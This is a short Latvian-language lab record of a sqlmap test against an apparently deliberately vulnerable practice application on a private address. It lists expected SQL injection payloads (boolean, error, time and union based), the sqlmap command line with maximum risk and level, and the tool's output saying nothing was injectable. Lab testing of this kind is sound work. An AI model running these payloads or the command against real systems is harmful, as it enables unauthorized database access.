=================================================================================
1. Īpašība: parameters satur nevis lietotājvārdu, bet daļu no vaicājuma, kas atlasa lietotājvārdu
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: ?req=username%3d%27hacker%27 or 1=1
3.2. error-based: ?req=username%3d%27hacker%27%27
3.3. time-based: ?req=username%3d%27hacker%27 or sleep(5)
3.4. union: ?req=username%3d%27hacker%27 union select 1,2,3
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 71772400 nanosekundes
6. Palaistā komanda
sqlmap -u "http://192.168.17.134/sqlinjection/example4/?req=username%3d%27hacker%27" -p req --risk=3 --level=5


7. Jautājumi, kurus uzdeva SQLMap
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] yfh
=================================================================================
all tested parameters do not appear to be injectable.  As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'